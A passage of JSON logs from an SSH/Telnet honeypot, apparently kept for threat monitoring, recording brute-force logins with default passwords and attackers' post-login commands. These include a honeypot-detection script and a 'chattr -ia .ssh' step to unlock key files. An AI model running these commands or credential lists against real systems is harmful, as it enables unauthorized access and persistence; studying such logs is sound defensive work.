sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:40:22.947874Z","src_ip":"212.227.125.160","session":"65c8726856fd"}
{"eventid":"cowrie.login.failed","username":"operator","password":"12345","message":"login attempt [operator/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T13:40:23.435179Z","src_ip":"212.227.125.160","session":"65c8726856fd"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:40:24.598322Z","src_ip":"212.227.125.160","session":"65c8726856fd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:40:28.028332Z","src_ip":"212.227.235.229","session":"15cbc26c7ced"}
{"eventid":"cowrie.session.closed","duration":180.21711230278015,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:40:28.032474Z","src_ip":"212.227.235.229","session":"15cbc26c7ced"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33334,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6c9ef0ef878","protocol":"ssh","message":"New connection: 212.227.235.229:33334 (1.2.3.4:22) [session: b6c9ef0ef878]","sensor":"my-vps","timestamp":"2025-08-28T13:40:41.815717Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:40:41.816646Z","src_ip":"212.227.235.229","session":"b6c9ef0ef878"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T13:40:42.023271Z","src_ip":"212.227.235.229","session":"b6c9ef0ef878"}
{"eventid":"cowrie.login.failed","username":"mapadmin","password":"mapadmin","message":"login attempt [mapadmin/mapadmin] failed","sensor":"my-vps","timestamp":"2025-08-28T13:40:42.892916Z","src_ip":"212.227.235.229","session":"b6c9ef0ef878"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:40:44.101868Z","src_ip":"212.227.235.229","session":"b6c9ef0ef878"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40718,"dst_ip":"1.2.3.4","dst_port":22,"session":"1db270ec9e18","protocol":"ssh","message":"New connection: 212.227.125.160:40718 (1.2.3.4:22) [session: 1db270ec9e18]","sensor":"my-vps","timestamp":"2025-08-28T13:40:56.653677Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:40:56.666434Z","src_ip":"212.227.125.160","session":"1db270ec9e18"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:40:56.825910Z","src_ip":"212.227.125.160","session":"1db270ec9e18"}
{"eventid":"cowrie.login.failed","username":"operator","password":"12345678","message":"login attempt [operator/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T13:40:57.505670Z","src_ip":"212.227.125.160","session":"1db270ec9e18"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:40:58.749479Z","src_ip":"212.227.125.160","session":"1db270ec9e18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36904,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9a7a2094fef","protocol":"ssh","message":"New connection: 212.227.235.229:36904 (1.2.3.4:22) [session: c9a7a2094fef]","sensor":"my-vps","timestamp":"2025-08-28T13:41:11.880838Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:41:11.915351Z","src_ip":"212.227.235.229","session":"c9a7a2094fef"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T13:41:12.259975Z","src_ip":"212.227.235.229","session":"c9a7a2094fef"}
{"eventid":"cowrie.login.success","username":"root","password":"!Admin","message":"login attempt [root/!Admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:41:13.727785Z","src_ip":"212.227.235.229","session":"c9a7a2094fef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:41:14.334059Z","src_ip":"212.227.235.229","session":"c9a7a2094fef"}
{"eventid":"cowrie.command.input","input":"cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","message":"CMD: cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","sensor":"my-vps","timestamp":"2025-08-28T13:41:14.334798Z","src_ip":"212.227.235.229","session":"c9a7a2094fef"}
{"eventid":"cowrie.command.input","input":"grep model name /proc/cpuinfo 2 > /dev/null","message":"CMD: grep model name /proc/cpuinfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T13:41:14.335450Z","src_ip":"212.227.235.229","session":"c9a7a2094fef"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T13:41:14.337903Z","src_ip":"212.227.235.229","session":"c9a7a2094fef"}
{"eventid":"cowrie.command.input","input":"grep MemTotal /proc/meminfo 2 > /dev/null","message":"CMD: grep MemTotal /proc/meminfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T13:41:14.338813Z","src_ip":"212.227.235.229","session":"c9a7a2094fef"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T13:41:14.340186Z","src_ip":"212.227.235.229","session":"c9a7a2094fef"}
{"eventid":"cowrie.command.failed","input":"if [ -z ]","message":"Command not found: if [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T13:41:14.341312Z","src_ip":"212.227.235.229","session":"c9a7a2094fef"}
{"eventid":"cowrie.command.failed","input":"[ -z ]","message":"Command not found: [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T13:41:14.342394Z","src_ip":"212.227.235.229","session":"c9a7a2094fef"}
{"eventid":"cowrie.command.failed","input":"then","message":"Command not found: then","sensor":"my-vps","timestamp":"2025-08-28T13:41:14.343354Z","src_ip":"212.227.235.229","session":"c9a7a2094fef"}
{"eventid":"cowrie.command.failed","input":"else","message":"Command not found: else","sensor":"my-vps","timestamp":"2025-08-28T13:41:14.344488Z","src_ip":"212.227.235.229","session":"c9a7a2094fef"}
{"eventid":"cowrie.command.failed","input":"fi","message":"Command not found: fi","sensor":"my-vps","timestamp":"2025-08-28T13:41:14.346129Z","src_ip":"212.227.235.229","session":"c9a7a2094fef"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","shasum":"070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","destfile":"/dev/null","message":"Saved redir contents with SHA-256 070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac to var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","sensor":"my-vps","timestamp":"2025-08-28T13:41:14.637905Z","src_ip":"212.227.235.229","session":"c9a7a2094fef"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","size":289,"shasum":"69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:41:14.638901Z","src_ip":"212.227.235.229","session":"c9a7a2094fef"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:41:14.640353Z","src_ip":"212.227.235.229","session":"c9a7a2094fef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42236,"dst_ip":"1.2.3.4","dst_port":23,"session":"6c19d310d2c2","protocol":"telnet","message":"New connection: 212.227.235.229:42236 (1.2.3.4:23) [session: 6c19d310d2c2]","sensor":"my-vps","timestamp":"2025-08-28T13:41:18.923184Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:41:19.112231Z","src_ip":"212.227.235.229","session":"6c19d310d2c2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:41:19.559216Z","src_ip":"212.227.235.229","session":"6c19d310d2c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41778,"dst_ip":"1.2.3.4","dst_port":22,"session":"11c747f7d549","protocol":"ssh","message":"New connection: 212.227.125.160:41778 (1.2.3.4:22) [session: 11c747f7d549]","sensor":"my-vps","timestamp":"2025-08-28T13:41:32.107470Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:41:32.108705Z","src_ip":"212.227.125.160","session":"11c747f7d549"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:41:32.276348Z","src_ip":"212.227.125.160","session":"11c747f7d549"}
{"eventid":"cowrie.login.failed","username":"operator","password":"qwerty","message":"login attempt [operator/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T13:41:33.327490Z","src_ip":"212.227.125.160","session":"11c747f7d549"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:41:34.501358Z","src_ip":"212.227.125.160","session":"11c747f7d549"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37674,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3322707235f","protocol":"ssh","message":"New connection: 212.227.125.160:37674 (1.2.3.4:22) [session: b3322707235f]","sensor":"my-vps","timestamp":"2025-08-28T13:42:07.441923Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:42:07.453226Z","src_ip":"212.227.125.160","session":"b3322707235f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:42:07.617864Z","src_ip":"212.227.125.160","session":"b3322707235f"}
{"eventid":"cowrie.login.failed","username":"operator","password":"123123","message":"login attempt [operator/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T13:42:08.527276Z","src_ip":"212.227.125.160","session":"b3322707235f"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:42:09.706700Z","src_ip":"212.227.125.160","session":"b3322707235f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51180,"dst_ip":"1.2.3.4","dst_port":22,"session":"b490c42b703c","protocol":"ssh","message":"New connection: 212.227.235.229:51180 (1.2.3.4:22) [session: b490c42b703c]","sensor":"my-vps","timestamp":"2025-08-28T13:42:30.586091Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:42:30.586869Z","src_ip":"212.227.235.229","session":"b490c42b703c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T13:42:30.794408Z","src_ip":"212.227.235.229","session":"b490c42b703c"}
{"eventid":"cowrie.session.connect","src_ip":"54.39.145.137","src_port":37028,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3e662119ad3","protocol":"ssh","message":"New connection: 54.39.145.137:37028 (1.2.3.4:22) [session: f3e662119ad3]","sensor":"my-vps","timestamp":"2025-08-28T13:42:30.987879Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:42:30.988785Z","src_ip":"54.39.145.137","session":"f3e662119ad3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T13:42:31.090287Z","src_ip":"54.39.145.137","session":"f3e662119ad3"}
{"eventid":"cowrie.login.success","username":"root","password":"19850612","message":"login attempt [root/19850612] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:42:31.523891Z","src_ip":"54.39.145.137","session":"f3e662119ad3"}
{"eventid":"cowrie.login.failed","username":"wolli","password":"wolli","message":"login attempt [wolli/wolli] failed","sensor":"my-vps","timestamp":"2025-08-28T13:42:31.664149Z","src_ip":"212.227.235.229","session":"b490c42b703c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:42:31.737664Z","src_ip":"54.39.145.137","session":"f3e662119ad3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T13:42:31.738368Z","src_ip":"54.39.145.137","session":"f3e662119ad3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T13:42:31.739520Z","src_ip":"54.39.145.137","session":"f3e662119ad3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:42:31.840074Z","src_ip":"54.39.145.137","session":"f3e662119ad3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:42:32.103390Z","src_ip":"54.39.145.137","session":"f3e662119ad3"}
